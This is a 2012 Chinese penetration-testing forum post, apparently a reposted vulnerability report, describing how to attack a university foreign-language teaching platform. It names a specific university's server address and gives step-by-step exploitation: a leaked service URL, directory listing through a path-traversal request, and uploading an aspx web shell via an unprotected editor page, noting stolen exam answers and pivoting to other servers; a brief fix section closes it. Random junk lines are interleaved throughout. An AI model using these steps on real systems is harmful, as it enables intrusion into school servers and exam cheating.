中国网络渗透测试联盟
标题:
新理念外语网络教学平台文件上传漏洞
[打印本页]
作者:
admin
时间:
2012-12-4 11:10
标题:
新理念外语网络教学平台文件上传漏洞
好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中
?3 `7 i6 D. a) J" d( [
' F2 n u$ z+ d) L1 X3 Y/ T
详细说明:
" m; r9 u' G3 t6 @5 i" G! l: p2 W
5 Q, J7 S! n$ Q( g ^
以南开大学的为例:
+ v E2 i5 A; k, h
http://222.30.60.3/NPELS
! v% j- H' O! q, O! j
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
0 ?* d2 x% {8 s+ ~- [! g; o
<setting name="Update_CommonSvr_CommonService" serializeAs="String">
9 H `7 z5 w3 V4 Q' F+ T
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
; S. v5 i/ Z- P' \
</setting>
- O! b2 z) Q0 M. h6 Y ?; b3 }, ^
及版本号
* e! S( L' { f# r( ]
<add key="TVersion" value="1, 0, 0, 2187">
6 h& P0 M& n3 x
</add>
1 B0 r8 @- q8 Q$ m5 l+ A
直接访问
" t: M6 D; t8 B/ D; i+ t$ q
http://222.30.60.3/NPELS/CommonService.asmx
! l# ^4 a. k5 o* n, C% V! b
使用GetTestClientFileList操作,直接 HTTP GET 列目录:
8 x) i7 ^9 {) }% s
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1
, 0, 0, 2187
) _4 b6 l! x% T
进一步列目录(返回的网页很大,可以直接 wget 下来)
3 H3 ~+ U0 b- |6 [- f: M4 ]
http://222.30.60.3/NPELS/CommonS ... List?version=../../
. k. Q8 g x' x5 [
; M3 m2 @) b; e0 v$ e
发现
+ h& V) U5 B. T
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
' `8 {/ f$ L2 b3 M3 G( `. ]
可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头
8 U' Z# C0 f# m C6 a
上传后继续列目录找到木马地址直接访问即可
; i# s: O( q, U% o$ \0 g3 t
$ u1 S4 O; H; P& G3 }. n# ~
OOXX
. {; S4 \7 o/ e1 x0 o
5 ~, i; H/ \1 T% l& S. F+ m w
Google "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法
8 j U% R9 W; W( |0 Y
漏洞证明:
6 }* [$ G' C# ]8 d: h+ U) H4 x
% j6 P* j# u5 ^9 U9 o
列目录:
# Z0 w% L# V; }9 d! @: G
http://222.30.60.3/NPELS/CommonS ... List?version=../../
0 U" J' z- ~6 [: M
文件上传:
5 s$ v& ^0 p- |* {; W
http://222.30.60.3/npelsv/editor/editor.htm
! y5 D ?. l. c2 `8 x/ q. o) [: i
, Q: h) a) k, z# Q
上传木马:
1 e( `1 X) Y5 e7 g
http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx
] k- R% [1 |/ u; r9 @& M3 u
' z- | s. w2 D- j. P0 K
修复方案:
" R, d% i' J+ ]0 Z8 U* Z" k& b
好像考试系统必须使用 CommonService.asmx
( T& O/ r- | N
最好配置文件加密或者用别的方式不让它泄露出来
0 j$ G. W7 G) b6 r9 B% w" b+ G
并且检查或删除各上传入口,像
http://222.30.60.3/NPELS/Upload.aspx
一样
6 N' |0 j" d& [8 `3 |
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2